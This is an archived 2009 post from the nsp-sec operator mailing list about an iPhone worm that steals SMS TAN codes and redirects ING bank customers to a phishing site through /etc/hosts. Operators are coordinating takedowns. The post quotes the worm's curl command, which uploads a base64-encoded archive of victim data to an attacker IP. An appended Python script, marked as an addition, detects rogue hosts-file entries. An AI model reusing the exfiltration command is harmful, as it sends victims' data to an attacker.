[nsp-sec] iPhone worm: Confirmed - possibly steals SMS messages.

Scott A. McIntyre scott at xs4all.net
Sun Nov 22 11:43:39 EST 2009


Hi,


On Nov 20, 2009, at 15:29 , Tim Wilde wrote:

> ----------- nsp-security Confidential --------
> 
> On 11/20/2009 8:56 AM, Scott A. McIntyre wrote:
>> However, it does grab other data and upload it:
>> 
>> curl 92.61.38.16/xml/a.php?name=$ID  --data "data=`base64 -w 0 ${ID}.tgz| sed -e 's/+/%plu/g'`"
>> 
>> I've asked Team Cymru to blackhole that IP address, I've already done so here.
>> 
>> AS      | IP               | AS Name
>> 47205   | 92.61.38.16      | HOSTEX HOSTEX autonomous system
> 
> Hey Team,
> 
> The IP has been added to the DDoS-RS list, you can see its entry in
> ddos-rsv2.txt:

[ snip ]

I realise this is mostly of interest to Apple fanbois like me, but thought I'd update you all that the "bot" now specifically looks for "TAN codes" in the SMS database and phones home for different instructions. On top of that, it is redirecting Dutch ING bank customers to a phishing site in Japan by creating a static /etc/hosts entry for the website.

I've asked JPCERT to try to kill hxxp :// 210 .233.73.206/internetbankieren/ but if anyone else has contacts that can do that, I'm sure they'd appreciate it over at ING bank.

Best regards,

Scott A. McIntyre
XS4ALL Internet B.V.
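A defender-side check for the /etc/hosts redirection described in the message above, added here as an example and not code from the thread or from XS4ALL: it parses a hosts file and flags any entry that pins a watched banking hostname to a non-loopback address. The watchlist suffix `bank.example`, the sample hosts file and the TEST-NET address 203.0.113.10 are constructed placeholders.

```python
import ipaddress

# Constructed watchlist: hostnames that should never be pinned locally.
# A real deployment would list the institution's own hostnames instead.
WATCHED_SUFFIXES = ("bank.example",)

# Constructed sample hosts file resembling the case in the thread:
# a static entry that pins a bank hostname to a foreign address.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost
# entry added by the worm (constructed sample, TEST-NET address)
203.0.113.10  online.bank.example bank.example
"""


def parse_hosts(text):
    """Yield (address, hostname) pairs from hosts-file text, skipping comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed address field: the resolver ignores it too
        for host in fields[1:]:
            yield addr, host.lower()


def suspicious_overrides(text, watched=WATCHED_SUFFIXES):
    """Return (address, hostname) pairs that redirect a watched domain."""
    hits = []
    for addr, host in parse_hosts(text):
        if not any(host == s or host.endswith("." + s) for s in watched):
            continue
        if addr.is_loopback:
            continue  # a loopback pin only blocks the site; it is not a redirect
        hits.append((str(addr), host))
    return hits


if __name__ == "__main__":
    for addr, host in suspicious_overrides(SAMPLE_HOSTS):
        print(f"ALERT: {host} pinned to {addr} in hosts file")
```

Run the same function over the device's real /etc/hosts and a watchlist of the bank's actual hostnames to catch the static entry the worm drops.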